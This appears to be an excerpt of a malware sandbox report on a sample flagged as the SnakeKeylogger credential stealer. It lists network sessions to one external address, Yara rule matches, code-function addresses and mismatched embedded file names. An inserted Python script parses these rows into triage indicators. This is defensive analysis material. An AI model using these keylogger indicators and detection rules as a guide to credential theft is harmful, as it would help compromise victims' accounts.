                Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
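The rows in this report (the networking and string rows above, and the Yara, code-function and OriginalFilename rows in the System Summary that follows) are flattened table cells: the Source column runs straight into the description column, as in "unknownNetwork traffic detected:". The Python script below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It splits such rows on a fixed list of description labels and reduces them to the facts a triage analyst wants first: the non-private TLS endpoint, the number of client sessions, distinct Yara hits per rule collapsed across unpacked regions, OriginalFilename values that disagree with the on-disk name, and the dumped memory regions grouped per process. The embedded sample rows are copied from this report; the label list, the regex field names and the reading of a dump identifier's first field as a hexadecimal process index (00000010 is process 16, the same process as the 16_2_ code-function rows for ZOlmYtPdlO.exe) are assumptions drawn from the report's own naming, not documented format rules.

```python
"""Normalise flattened Joe Sandbox signature rows into triage-ready IOCs.
Constructed example, not part of the report or of Joe Security's tooling; it
assumes rows in the shape seen on this page, where the Source cell and the
description cell were fused ('unknownNetwork traffic detected:')."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample: rows copied in the exact shape they take in this report.
SAMPLE_ROWS = """\
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
"""

# Description labels that the flattened rows run straight into the Source cell (assumed list).
LABELS = ("Network traffic detected", "HTTPS traffic detected", "String found in binary or memory",
          "Matched rule", "Binary or memory string", "Code function", "Static PE information")
ROW_RE = re.compile(r"^Source:\s*(?P<source>.*?)(?P<label>" + "|".join(map(re.escape, LABELS)) + r"):\s*(?P<detail>.*)$")
HTTPS_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> (\d{1,3}(?:\.\d{1,3}){3}):(\d+)")
PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
RULE_RE = re.compile(r"^(?P<rule>.+?)\s+Author:\s*(?P<author>.+)$")
# 'OriginalFilenameRemington.exe4': the stray character after the extension is residue of the
# UTF-16 version-resource dump (assumption), so only the file name itself is captured.
ORIGNAME_RE = re.compile(r"OriginalFilename(?P<name>\S+?\.(?:exe|dll))\S* vs (?P<sample>\S+)", re.I)
# <image>, <process index, hex>.<stage>.<dump id>.<base address>.<...>.sdmp
SDMP_RE = re.compile(r"(?P<image>[\w.-]+),\s*(?P<proc>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})\.[0-9A-F.]+sdmp")


def parse_rows(text):
    """Split each fused row into (source, label, detail); rows with an unknown label are dropped."""
    matches = (ROW_RE.match(line.strip()) for line in text.splitlines())
    return [(m["source"].strip(), m["label"], m["detail"].strip()) for m in matches if m]


def remote_endpoints(rows):
    """Non-private ip:port from HTTPS rows, whichever side of the arrow it is on."""
    found = set()
    for _, label, detail in rows:
        m = HTTPS_RE.search(detail) if label == "HTTPS traffic detected" else None
        for ip, port in (((m[1], m[2]), (m[3], m[4])) if m else ()):
            if not ipaddress.ip_address(ip).is_private:
                found.add(f"{ip}:{port}")
    return sorted(found)


def client_ports(rows, server_port=443):
    """Ephemeral ports talking to server_port; each session is listed twice (443 -> p and p -> 443)."""
    ports = set()
    for _, label, detail in rows:
        m = PORT_RE.search(detail) if label == "Network traffic detected" else None
        if m:
            a, b = int(m[1]), int(m[2])
            ports.add(b if a == server_port else a)
    return sorted(ports)


def yara_rules(rows):
    """Rule -> number of distinct sources it fired on; the sandbox lists every unpacked region separately."""
    hits = defaultdict(set)
    for source, label, detail in rows:
        if label == "Matched rule":
            m = RULE_RE.match(detail)
            hits[m["rule"] if m else detail].add(source)
    return {rule: len(srcs) for rule, srcs in hits.items()}


def original_filename_mismatches(rows):
    """Embedded OriginalFilename -> on-disk sample name, where the two differ (renamed or repacked PE)."""
    out = {}
    for _, label, detail in rows:
        m = ORIGNAME_RE.search(detail) if label == "Binary or memory string" else None
        if m and m["name"].lower() != m["sample"].lower():
            out[m["name"]] = m["sample"]
    return out


def dump_regions(rows):
    """(image, process index) -> base addresses of its .sdmp regions. The first dotted field
    is taken as the process index in hex: 00000010 is process 16, i.e. the 16_2_... code-function rows."""
    regions = defaultdict(set)
    for source, _, _ in rows:
        for m in SDMP_RE.finditer(source):
            regions[(m["image"], int(m["proc"], 16))].add(int(m["base"], 16))
    return {key: sorted(bases) for key, bases in regions.items()}


def summarize(text):
    """One JSON-friendly dict with everything above, for pasting into a case note."""
    rows = parse_rows(text)
    return {"remote_endpoints": remote_endpoints(rows), "tls_sessions": len(client_ports(rows)),
            "yara_rules": yara_rules(rows), "original_filename_mismatches": original_filename_mismatches(rows),
            "dump_regions": {f"{img} (process {idx})": [hex(b) for b in bases]
                             for (img, idx), bases in dump_regions(rows).items()}}
```

Call summarize() on the text of a saved report in place of SAMPLE_ROWS. Rows whose description label is not in LABELS are silently dropped, so extend that tuple before trusting a zero count for a category, and note that yara_rules counts sources, not processes: the same process contributes one hit per unpacked region or dump that matched.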

                System Summary

                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sample | Static PE information: Filename: rShipmentDocuments.exe
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 0_2_0177E06C
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 0_2_058D9518
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 0_2_058DA8B0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 0_2_058DA8C0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3D278
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A35362
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3A088
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A37118
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3C148
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3C738
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3C468
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3CA08
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A369B0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3E988
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3CFAA
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3CCD8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A329E0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3F961
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A3E97A
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_02A33E09
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F9C18
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FFC68
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F2288
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F1BA8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FF3B8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F9328
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F0B30
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F5028
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F2970
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FE6A0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FE6B0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FDE00
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FEF51
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FEF60
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FCCA0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FDDFF
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F9548
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FD540
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FD550
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FEAF8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FE24A
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FE258
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F2278
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F8BA0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FEB08
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F0B20
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F1B77
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FD0E9
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FD0F8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F0007
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FF802
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F5018
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FF810
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068F0040
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FD999
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 9_2_068FD9A8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_0094E06C
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_04CE9518
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_04CEA8C0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_04CEA8B0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069CC2E0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C1998
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C66D0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C4660
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C4ED0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C4A98
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C4A88
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C1A4A
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C6B08
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 10_2_069C1989
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_03035362
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303D278
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_03037118
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303C146
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303A088
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303C738
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303C468
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303CA08
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303E988
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_030369A0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303CFA9
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303CCD8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_03033AA1
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303F961
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_0303E97A
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_030339EE
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_030329EC
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_03033E09
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D81E80
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8F3B8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D817A0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D80B30
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D89C70
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8FC68
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D85028
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D89548
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D82968
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8EAF8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8E6B0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8E6AF
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8E258
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8E249
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D81E70
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8DE00
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D89BFB
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D88B91
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8178F
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D88BA0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8EF51
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8EF60
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8EB08
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D89328
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D80B20
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8D0F8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8CCA0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D80040
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8501F
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8F810
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8F801
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D80007
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8DDFF
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8D999
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8D9A8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8D550
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 16_2_06D8D540
                Source: rShipmentDocuments.exe, 00000000.00000002.1735749873.0000000007DB0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000000.1674316077.0000000000F64000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameYGc.exe6 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1736191962.0000000009214000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1726790229.00000000013FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000009.00000002.4134998750.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000446000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe | Binary or memory string: OriginalFilenameYGc.exe6 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
